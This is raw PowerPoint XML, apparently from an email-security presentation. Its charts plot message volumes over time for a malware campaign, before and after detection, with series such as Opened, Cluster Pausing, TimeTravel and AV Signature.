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00" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="307" r:id="rId2"/>
    <p:sldId id="529" r:id="rId3"/>
    <p:sldId id="412" r:id="rId4"/>
    <p:sldId id="413" r:id="rId5"/>
    <p:sldId id="414" r:id="rId6"/>
    <p:sldId id="428" r:id="rId7"/>
    <p:sldId id="435" r:id="rId8"/>
    <p:sldId id="509" r:id="rId9"/>
    <p:sldId id="510" r:id="rId10"/>
    <p:sldId id="511" r:id="rId11"/>
    <p:sldId id="512" r:id="rId12"/>
    <p:sldId id="513" r:id="rId13"/>
    <p:sldId id="479" r:id="rId14"/>
    <p:sldId id="503" r:id="rId15"/>
    <p:sldId id="504" r:id="rId16"/>
    <p:sldId id="505" r:id="rId17"/>
    <p:sldId id="506" r:id="rId18"/>
    <p:sldId id="508" r:id="rId19"/>
    <p:sldId id="464" r:id="rId20"/>
    <p:sldId id="443" r:id="rId21"/>
    <p:sldId id="438" r:id="rId22"/>
    <p:sldId id="515" r:id="rId23"/>
    <p:sldId id="526" r:id="rId24"/>
    <p:sldId id="528" r:id="rId25"/>
    <p:sldId id="527" r:id="rId26"/>
    <p:sldId id="520" r:id="rId27"/>
    <p:sldId id="521" r:id="rId28"/>
    <p:sldId id="522" r:id="rId29"/>
    <p:sldId id="516" r:id="rId30"/>
    <p:sldId id="517" r:id="rId31"/>
    <p:sldId id="421" r:id="rId32"/>
    <p:sldId id="422" r:id="rId33"/>
    <p:sldId id="425" r:id="rId34"/>
    <p:sldId id="458" r:id="rId35"/>
    <p:sldId id="530" r:id="rId36"/>
    <p:sldId id="496"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STIC Template Light" id="{E1C8FB21-FF75-44A0-8090-B2FB240B014B}">
          <p14:sldIdLst>
            <p14:sldId id="307"/>
            <p14:sldId id="529"/>
            <p14:sldId id="412"/>
            <p14:sldId id="413"/>
            <p14:sldId id="414"/>
            <p14:sldId id="428"/>
            <p14:sldId id="435"/>
            <p14:sldId id="509"/>
            <p14:sldId id="510"/>
            <p14:sldId id="511"/>
            <p14:sldId id="512"/>
            <p14:sldId id="513"/>
            <p14:sldId id="479"/>
            <p14:sldId id="503"/>
            <p14:sldId id="504"/>
            <p14:sldId id="505"/>
            <p14:sldId id="506"/>
            <p14:sldId id="508"/>
            <p14:sldId id="464"/>
            <p14:sldId id="443"/>
            <p14:sldId id="438"/>
            <p14:sldId id="515"/>
            <p14:sldId id="526"/>
            <p14:sldId id="528"/>
            <p14:sldId id="527"/>
            <p14:sldId id="520"/>
            <p14:sldId id="521"/>
            <p14:sldId id="522"/>
            <p14:sldId id="516"/>
            <p14:sldId id="517"/>
            <p14:sldId id="421"/>
            <p14:sldId id="422"/>
            <p14:sldId id="425"/>
            <p14:sldId id="458"/>
            <p14:sldId id="530"/>
            <p14:sldId id="4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1E1E1E"/>
    <a:srgbClr val="E81123"/>
    <a:srgbClr val="B4009E"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="086AA0"/>
    <a:srgbClr val="525252"/>
    <a:srgbClr val="EAEAEA"/>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77" autoAdjust="0"/>
    <p:restoredTop sz="95337" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54" d="100"/>
        </p:scale>
        <p:origin x="18" y="20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245"/>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arogers\Documents\AMDailyStandup\Sample%20Campaig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arogers\Documents\AMDailyStandup\Sample%20Campaig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Common Campaign Profile – New malware variant - Before</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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spPr>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$B$2:$B$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="0">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>200</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>300</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>800</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2100</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2500</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2450</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2300</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2175</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>1965</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>1875</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1972</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>1999</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2060</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>2101</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>2062</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>1987</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>1946</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>1873</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>1783</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>1773</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>1731</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>1711</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>1623</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>1560</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>1527</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>1450</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>1404</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>1386</c:v>
                </c:pt>
                <c:pt idx="50">
                  <c:v>1343</c:v>
                </c:pt>
                <c:pt idx="51">
                  <c:v>1269</c:v>
                </c:pt>
                <c:pt idx="52">
                  <c:v>1203</c:v>
                </c:pt>
                <c:pt idx="53">
                  <c:v>1184</c:v>
                </c:pt>
                <c:pt idx="54">
                  <c:v>1147</c:v>
                </c:pt>
                <c:pt idx="55">
                  <c:v>1122</c:v>
                </c:pt>
                <c:pt idx="56">
                  <c:v>1054</c:v>
                </c:pt>
                <c:pt idx="57">
                  <c:v>1050</c:v>
                </c:pt>
                <c:pt idx="58">
                  <c:v>1025</c:v>
                </c:pt>
                <c:pt idx="59">
                  <c:v>1017</c:v>
                </c:pt>
                <c:pt idx="60">
                  <c:v>900</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$B$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>Opened</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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0-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$C$2:$C$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$C$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>Cluster Pausing</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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1-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$D$2:$D$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$D$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>TimeTravel</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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2-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$E$2:$E$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="60">
                  <c:v>100</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$E$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>HFHRep</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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3-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$F$2:$F$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$F$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>HFHList</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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4-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$G$2:$G$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="61">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="62">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="63">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="64">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="65">
                  <c:v>10</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$G$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>AV Signature</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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5-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:overlap val="100"/>
        <c:axId val="694516624"/>
        <c:axId val="694517408"/>
      </c:barChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:spPr>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:val>
            <c:numRef>
              <c:f>'Undetected Morph'!$H$2:$H$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="0">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>200</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>300</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>800</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2100</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2500</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2450</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2300</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2175</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>1965</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>1875</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1972</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>1999</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2060</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>2101</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>2062</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>1987</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>1946</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>1873</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>1783</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>1773</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>1731</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>1711</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>1623</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>1560</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>1527</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>1450</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>1404</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>1386</c:v>
                </c:pt>
                <c:pt idx="50">
                  <c:v>1343</c:v>
                </c:pt>
                <c:pt idx="51">
                  <c:v>1269</c:v>
                </c:pt>
                <c:pt idx="52">
                  <c:v>1203</c:v>
                </c:pt>
                <c:pt idx="53">
                  <c:v>1184</c:v>
                </c:pt>
                <c:pt idx="54">
                  <c:v>1147</c:v>
                </c:pt>
                <c:pt idx="55">
                  <c:v>1122</c:v>
                </c:pt>
                <c:pt idx="56">
                  <c:v>1054</c:v>
                </c:pt>
                <c:pt idx="57">
                  <c:v>1050</c:v>
                </c:pt>
                <c:pt idx="58">
                  <c:v>1025</c:v>
                </c:pt>
                <c:pt idx="59">
                  <c:v>1017</c:v>
                </c:pt>
                <c:pt idx="60">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="61">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="62">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="63">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="64">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="65">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="66">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="67">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="68">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="69">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="70">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="71">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="72">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="73">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="74">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="75">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$H$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>Incoming Mail</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Undetected Morph'!$A$2:$A$77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6-08EB-4D57-8AF6-D322199BE869}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="694516624"/>
        <c:axId val="694517408"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="694516624"/>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4517408"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="69451740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4516624"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:legendEntry>
        <c:idx val="1"/>
        <c:delete val="1"/>
      </c:legendEntry>
      <c:legendEntry>
        <c:idx val="2"/>
        <c:delete val="1"/>
      </c:legendEntry>
      <c:legendEntry>
        <c:idx val="3"/>
        <c:delete val="1"/>
      </c:legendEntry>
      <c:legendEntry>
        <c:idx val="4"/>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Common Campaign Profile –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> New malware variant - Today</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spPr>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$B$2:$B$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="0">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>100</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>100</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>100</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>50</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$B$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>Opened</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
